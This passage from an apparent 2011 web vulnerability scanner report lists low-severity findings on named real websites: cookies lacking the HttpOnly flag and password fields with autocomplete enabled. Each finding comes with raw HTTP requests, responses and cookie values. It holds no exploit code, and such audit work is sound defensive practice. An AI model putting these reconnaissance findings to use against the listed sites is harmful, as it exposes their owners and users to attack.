ILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /boats/2010/Regulator-32fs-Center-Console-2293873/Brick/NJ/United-States HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:00:18 GMT
Server: Apache
Cache-Control: private
If-Modified-Since: Fri, 10 Dec 2010 20:05:25 GMT
Content-Language: en-US
Set-Cookie: VIEWED_BOATS_STORE=2293873%5B%25%5D32%27+Regulator+32FS+Center+Console%5B%25%5DUSD%26nbsp%3B219%2C000%5B%25%5DBrick%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F9%2F3%2F8%2F2293873_1_mini.jpg%3F1292001735000%5B%25%5D%2Fboats%2F2010%2FRegulator-32FS-Center-Console-2293873%2FBrick%2FNJ%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; path=/; expires=Fri, 27-Jan-2012 20:00:18 GMT
Set-Cookie: VIEWED_BOATS_STORE=2293873%5B%25%5D32%27+Regulator+32FS+Center+Console%5B%25%5DUSD%26nbsp%3B219%2C000%5B%25%5DBrick%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F9%2F3%2F8%2F2293873_1_mini.jpg%3F1292001735000%5B%25%5D%2Fboats%2F2010%2FRegulator-32FS-Center-Console-2293873%2FBrick%2FNJ%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

<t
...[SNIP]...

9.68. http://www.yachtworld.com/privatelabel/listing/cache/pl_search_results.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/privatelabel/listing/cache/pl_search_results.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

yw_c_id=5778232892790151794; path=/; expires=Tue, 14-Feb-2079 22:30:19 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /privatelabel/listing/cache/pl_search_results.jsp?slim=pp279757&cit=true&sm=3&is=&man=&fromLength=&toLength=&luom=126&fromYear=&toYear=&fromPrice=&toPrice=&currencyid=100&hmid=&ftid=&enid=&city=&spid=&rid=&cint=&msint=&ps=50 HTTP/1.1
Host: www.yachtworld.com
Proxy-Connection: keep-alive
Referer: http://www.atlanticmarinesales.com/index.php/inventory/new-inventory/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:16:13 GMT
Server: Apache
Cache-Control: private
Set-Cookie: yw_c_id=5778232892790151794; path=/; expires=Tue, 14-Feb-2079 22:30:19 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Content-Type: text/html; charset=utf-8
Content-Length: 16627

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<!-- /opt/weblogic/waeyw/ywcluster/public_html/broker_pages/atlanticmarine/boat
...[SNIP]...

9.69. https://www.yachtworld.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.yachtworld.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; domain=www.yachtworld.com; path=/; expires=Fri, 27-Jan-2012 20:48:10 GMT
savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
savedLabel0=24-32%20ft; domain=www.yachtworld.com; path=/; expires=Fri, 27-Jan-2012 20:48:10 GMT
savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; domain=www.yachtworld.com; path=/; expires=Fri, 27-Jan-2012 20:48:10 GMT
savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
savedLabel1=24-32%20ft,regulator, Used,2004,0%20US%20Dollars,United%20States; domain=www.yachtworld.com; path=/; expires=Fri, 27-Jan-2012 20:48:10 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

9.70. http://wzus1.ask.com/i/i.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://wzus1.ask.com
Path:	/i/i.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

wz_uid=0A4EDD4111C033B329ACD8C41BD460F3; path=/; expires=Sat, 26-Jan-2013 19:12:50 GMT; domain=.ask.com
wz_sid=014DDB4118C033B329ACD8C41BD460F3; path=/; expires=Thu, 27-Jan-2011 19:42:50 GMT; domain=.ask.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10. Password field with autocomplete enabled previous next
There are 19 instances of this issue:

http://malsup.com/jquery/form/
http://malsup.com/jquery/form/
http://malsup.com/jquery/form/
http://malsup.com/jquery/form/
http://malsup.com/jquery/form/
http://malsup.com/jquery/form/
http://www.ask.com/ja-ask-dialog
http://www.ask.com/ja-ask-dialog
http://www.ask.com/ja-ask-dialog
http://www.ask.com/jsignin
http://www.ask.com/jsignin
http://www.ask.com/settings
http://www.ask.com/settings
http://www.dynamicdrive.com/forums/showthread.php
https://www.linkedin.com/secure/login
http://www.reel-time.com/forum/showthread.php
http://www.yachtworld.com/boat-loans/index.jsp
https://www.yachtworld.com/boat-loans/index.jsp
https://www.yachtworld.com/boat-loans/myLoan.jsp

Issue background

Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.

The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.

Issue remediation

To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).

10.1. http://malsup.com/jquery/form/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://malsup.com
Path:	/jquery/form/

Issue detail

The page contains a form with the following action URL:

http://malsup.com/jquery/form/dummy.php

The form contains the following password field with autocomplete enabled:

password

Request

GET /jquery/form/ HTTP/1.1
Host: malsup.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:42:24 GMT
Server: mod_security2/2.5.7
X-Powered-By: PHP/5.2.9
Vary: Accept-Encoding,User-Agent
MS-Author-Via: DAV
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 57977

<!DOCTYPE html>
<html lang="en_US" class="ui-widget-content">
<head>
<title>jQuery Form Plugin</title>
<link rel="stylesheet" href="http://ajax.googleapis.com/ajax/libs/jqueryui/1.7.2/themes/black
...[SNIP]...
</h3>
<form id="validateForm1" action="dummy.php" method="post"><div>
...[SNIP]...
<input type="text" name="username" />
Password: <input type="password" name="password" />
<input type="submit" value="Submit" />
...[SNIP]...

10.2. http://malsup.com/jquery/form/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://malsup.com
Path:	/jquery/form/

Issue detail

The page contains a form with the following action URL:

http://malsup.com/jquery/form/dummy.php

The form contains the following password field with autocomplete enabled:

password

Request

GET /jquery/form/ HTTP/1.1
Host: malsup.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:42:24 GMT
Server: mod_security2/2.5.7
X-Powered-By: PHP/5.2.9
Vary: Accept-Encoding,User-Agent
MS-Author-Via: DAV
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 57977

<!DOCTYPE html>
<html lang="en_US" class="ui-widget-content">
<head>
<title>jQuery Form Plugin</title>
<link rel="stylesheet" href="http://ajax.googleapis.com/ajax/libs/jqueryui/1.7.2/themes/black
...[SNIP]...
</h3>
<form id="validateForm2" action="dummy.php" method="post"><div>
...[SNIP]...
<input type="text" name="username" />
Password: <input type="password" name="password" />
<input type="submit" value="Submit" />
...[SNIP]...

10.3. http://malsup.com/jquery/form/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://malsup.com
Path:	/jquery/form/

Issue detail

The page contains a form with the following action URL:

http://malsup.com/jquery/form/dummy.php

The form contains the following password field with autocomplete enabled:

password

Request

GET /jquery/form/ HTTP/1.1
Host: malsup.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.4. http://malsup.com/jquery/form/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://malsup.com
Path:	/jquery/form/

Issue detail

The page contains a form with the following action URL:

http://malsup.com/jquery/form/dummy.php

The form contains the following password field with autocomplete enabled:

Password

Request

GET /jquery/form/ HTTP/1.1
Host: malsup.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.5. http://malsup.com/jquery/form/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://malsup.com
Path:	/jquery/form/

Issue detail

The page contains a form with the following action URL:

http://malsup.com/jquery/form/dummy.php

The form contains the following password field with autocomplete enabled:

Password

Request

GET /jquery/form/ HTTP/1.1
Host: malsup.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.6. http://malsup.com/jquery/form/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://malsup.com
Path:	/jquery/form/

Issue detail

The page contains a form with the following action URL:

http://malsup.com/jquery/form/dummy2.php

The form contains the following password field with autocomplete enabled:

Password

Request

GET /jquery/form/ HTTP/1.1
Host: malsup.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.7. http://www.ask.com/ja-ask-dialog previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.ask.com
Path:	/ja-ask-dialog

Issue detail

The page contains a form with the following action URL:

https://secure.ask.com/ja-authenticate

The form contains the following password field with autocomplete enabled:

password

Request

Response

10.8. http://www.ask.com/ja-ask-dialog previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.ask.com
Path:	/ja-ask-dialog

Issue detail

The page contains a form with the following action URL:

http://www.ask.com/ja-check-user

The form contains the following password fields with autocomplete enabled:

password
password2

Request

Response

10.9. http://www.ask.com/ja-ask-dialog previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.ask.com
Path:	/ja-ask-dialog

Issue detail

The page contains a form with the following action URL:

https://secure.ask.com/ja-authenticate

The form contains the following password field with autocomplete enabled:

password

Request

Response

10.10. http://www.ask.com/jsignin previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.ask.com
Path:	/jsignin

Issue detail

The page contains a form with the following action URL:

http://www.ask.com/jsignin

The form contains the following password field with autocomplete enabled:

password

Request

Response

10.11. http://www.ask.com/jsignin previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.ask.com
Path:	/jsignin

Issue detail

The page contains a form with the following action URL:

http://www.ask.com/jsignin?o=0&l=dir

The form contains the following password field with autocomplete enabled:

password

Request

GET /jsignin?o=0&l=dir HTTP/1.1
Host: www.ask.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cu.wz=0; gcht=; gc=; tbe=1; accepting=1; user=o=0&l=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjEyOjQzLVVUQw%3D%3D&po=0&pp=dir; gct=; qc=0;

Response

10.12. http://www.ask.com/settings previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.ask.com
Path:	/settings

Issue detail

The page contains a form with the following action URL:

http://www.ask.com/settings?o=0&l=dir

The form contains the following password fields with autocomplete enabled:

currentpassword
newpassword
password

Request

GET /settings?o=0&l=dir HTTP/1.1
Host: www.ask.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cu.wz=0; gcht=; gc=; tbe=1; accepting=1; user=o=0&l=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjEyOjQzLVVUQw%3D%3D&po=0&pp=dir; gct=; qc=0;

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html;charset=UTF-8
Cache-Control: no-cache
Date: Thu, 27 Jan 2011 19:13:32 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cu.wz=0; Domain=.ask.com; Expires=Sat, 26-Jan-2013 19:13:31 GMT; Path=/
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjEzOjMxLVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:13:31 GMT; Path=/
Set-Cookie: ldpt=porg=5488|0~5489|0~5490|0~5396|0~5397|0; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:13:31 GMT; Path=/
Content-Length: 55326

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">

<html>

<head>

...[SNIP]...
</div>
<form name="myForm2" id="myForm2">
<div id="passsuccessmsg">
...[SNIP]...
<div ><input style="margin-top:6px;" class="passwd pgcset" type="password" size="35" name="currentpassword" id="currentpassword" value=""></div>
...[SNIP]...
<div ><input style="margin-top:6px;" class="passwd pgcset" type="password" size="35" name="newpassword" id="newpassword" value=""> </div>
...[SNIP]...
<div ><input style="margin-top:6px;" class="passwd pgcset" type="password" size="35" name="password" id="password" value=""> </div>
...[SNIP]...

10.13. http://www.ask.com/settings previous next

Summary

Severity:	Low
Confidence:	Certain
